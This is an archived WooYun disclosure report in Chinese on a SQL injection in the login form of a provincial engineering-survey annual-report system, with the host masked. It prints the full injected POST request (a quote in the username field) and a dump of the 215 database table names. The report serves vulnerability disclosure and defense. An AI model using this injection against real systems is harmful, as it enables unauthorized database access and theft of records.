乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-26: 细节已通知厂商并且等待厂商处理中 2015-09-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-10: 细节向核心白帽子及相关领域专家公开 2015-10-20: 细节向普通白帽子公开 2015-10-30: 细节向实习白帽子公开 2015-11-14: 细节向公众公开
求个码!!~@@!!@
**.**.**.**/yearreport/default_province.aspx?tempid=dc808932-c348-4d8a-9490-f2b8cc4ff95f 登录POST注入当前库大量信息,200+表,存贮大量工程勘察报表信息
POST /yearreport/default_province.aspx?tempid=ca183341-8daf-4e5f-9754-f4a0e50cf97d HTTP/1.1Host: **.**.**.**Content-Length: 619Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/yearreport/default_province.aspx?tempid=ca183341-8daf-4e5f-9754-f4a0e50cf97dAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=zzptfz55z0hslbuy2xfyz2i0__VIEWSTATE=%2FwEPDwUJNzAwNTk5ODY0DxYCHgdNZXNzYWdlBRNxaWJraGxucWJtbGRibXF4dWFiFgJmD2QWBgIFDw8WAh4EVGV4dAVd5a2X56ym5LiyICdhYWFhJycg5LmL5YmN5pyJ5pyq6Zet5ZCI55qE5byV5Y%2B344CCDQrnrKwgMSDooYw6ICdhYWFhJycg6ZmE6L%2BR5pyJ6K%2Bt5rOV6ZSZ6K%2Bv44CCZGQCBw8PZBYCHgdvbmNsaWNrBQsgVmFsaWRhdGUoKWQCCw8PZBYCHwIFCyBWYWxpZGF0ZSgpZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjK5hfSmJ5ND0CxXKuaaUZag07hkAw%3D%3D&txtUserName=aaaa%27&txtPassWord=aaaa&ImageButton1.x=58&ImageButton1.y=15&UserPIN=1234&__EVENTVALIDATION=%2FwEWBgLN582ZCQKl1bKzCQK1qbSWCwLSwpnTCALSwtXkAgL03sPdBB7RMNAxJJ552J9NqzirzN0pEb%2FD
Database: YearReport[215 tables]+-----------------------------+| OAMDBSFormConfig || OAMMasterViewConfig || OAMStatPrintConfig || OAMSubViewConfig || ProjectList || SYS_BIZINSTANCE || SYS_BIZKEYWORDDEF || SYS_BIZTYPEDEF || SYS_COLRESTRICT || SYS_CodeValue || SYS_Coding || SYS_CodingSection || SYS_DATABANK || SYS_DATABANKRELATION || SYS_DEPTDEF || SYS_DataGroup || SYS_FIELDATTR || SYS_FIELDDEF || SYS_FL_Activity || SYS_FL_FlowDirectDef || SYS_FL_NodeDef || SYS_FL_Process || SYS_FL_Remind || SYS_FL_TaskLog || SYS_FL_TaskLog || SYS_FL_TaskTrace || SYS_FL_Urgency || SYS_FL_WorkflowDef || SYS_FORMDEF || SYS_FileSvr || SYS_FileView || SYS_GlobalVarDef || SYS_GlobalVarDef || SYS_LocalVarDef || SYS_LocalVarDef || SYS_MaxKey || SYS_NODEFIELD || SYS_ObjectDef || SYS_ObjectPermission || SYS_ObjectRoles || SYS_PARAMCONFIG || SYS_POSITIONDEF || SYS_QueryCondition || SYS_RECORDBANK || SYS_RESTRICTTB || SYS_RIGHTTYPE || SYS_ROLEDEF || SYS_ROWRESTRICT || SYS_RP_DATA || SYS_RP_DB_Transform || SYS_RP_TYPES || SYS_SIGNDEF || SYS_SQLJoinDEF || SYS_STAFFDEF || SYS_TABLEDEF || SYS_TABLEGROUP || SYS_TABLERELATIONDEF || SYS_TEAMDEF || SYS_USERPOSITION || SYS_UserDept || SYS_UserRoleDynamic || SYS_UserRoleDynamic || SYS_UserTeam || SYS_VARLINK || Sys_BOMDef || Sys_BizFieldAttr || Sys_BizFileDirectory || Sys_BizFiles || Sys_BizNavigation || Sys_BizPivotTable || Sys_BomNodeType || Sys_DataJoinDef || Sys_DataSource || Sys_FileInfo || Sys_FilePostil || Sys_InstanceRecord || Sys_NodeRelation || Sys_NodeStatus || Sys_NodeTypeDef || Sys_NodeTypeValue || Sys_RP_DBInfo || Sys_RP_RptDBRelation || Sys_SectionRelation || Sys_TableFk || Sys_TaskFiles || Sys_VersionUpdate || Sys_fl_BindRelation || Sys_fl_ObjectBinding || TBCERTTITLELEVELDIC || TBCITYDIC || TBTECHFRUITTYPEDIC || TbAdminCityDic || TbAdminCityDicTmp || VIEW1 || VIEW2 || VIEW_LSP || corp || dtproperties || lspTest || mi_region_new || sys_RowPermission || sysconstraints || syssegments || tbAdminAreaDic || tbAdminSubjectionDic || tbAptitudeEconTypeDic || tbBargain || tbBargainTypeDic || tbCertListInfo || tbCertListInfoTmp || tbCertPrintCorpInfo2 || tbCertPrintCorpInfo2 || tbCertTypeDic || tbClanDic || tbCollectDetail_DeclareStat || tbCollectDetail_EconType || tbCollectDetail_Finance1 || tbCollectDetail_Finance2 || tbCollectDetail_Finance3 || tbCollectDetail_Operation2 || tbCollectDetail_Operation2 || tbCollectDetail_People || tbCollectDetail_SRQuarter || tbCollectDetail_Technology || tbCollectDetail_TitleLevel || tbCollectMain || tbCollectTypeDic || tbConditionDic || tbCorpBasicInfo || tbCorpBasicInfoTmp || tbCorpCertInfoNew || tbCorpCertInfoNewTmp || tbCorpMainBusinessDic || tbCorpStateDic || tbDeclareStat || tbDesignWorkPhaseDic || tbEconTypeDic || tbEconTypeOldNewDic || tbEduLevelDic || tbExpertTypeDic || tbGetTitleModeDic || tbIsBranchCorpDic || tbIsLockDic || tbIsProblemDic || tbIsReportDic || tbLeadArtDic || tbLogInfo || tbManageCorpRelation || tbManageCorpRelationTmp || tbManageDepart || tbManageDeptTypeDic || tbNationDic || tbNationalDic || tbNavManage || tbOpInfoDetail || tbOpInfoDetail || tbOpTypeDic || tbP2PRegInfo || tbParamInfo || tbPeopleNum || tbPersonSecretKey || tbPrincipalUnitDic || tbProjectLevel || tbProjectPlaceDic || tbProjectTypeDic || tbQuarterDic || tbRegEngineerTypeDic || tbRegThing || tbRegionGrd || tbReportConfig || tbSRArmyFinance || tbSRArmyOperation || tbSRBasicInfo || tbSRBasicInfoTmp || tbSRChongQingMonth || tbSRDeclaredCorpInfo || tbSRFinance || tbSRFinanceTmp || tbSRLastYearReconCorp || tbSRMustDeclareCorpInfo || tbSRNotDeclareCorpInfo || tbSROperation || tbSROperationTmp || tbSRPeople || tbSRPeopleTmp || tbSRRecTypeDic || tbSRUnderCorpInfo || tbSRUnderCorpInfoTmp || tbSexDic || tbSpecialtyDic || tbStatMonth || tbStatReportLock || tbStatReportLock || tbStatReportTmp || tbStatYearDic || tbStateDic || tbSuperKeyInfo || tbTargets || tbTaskQueue || tbTechLevelDic || tbTechTitleDic || tbTechTypeDic || tbTradeTypeBoundDic || tbTradeTypeDic || tbUnderCorpInfo || tbUpFileTypeDic || tbUserInfo || tbUserPower || tbWorkStationDic || tbWorkThingDic || test || viewBargain || viewCertDetail || viewCertMain || viewCorpManageMain |
危害等级:中
漏洞Rank:10
确认时间:2015-09-30 09:54
CNVD确认并复现所述情况,已由CNVD通过网站公开联系渠道向系统建设单位邮件通报,由其后续提供解决方案
暂无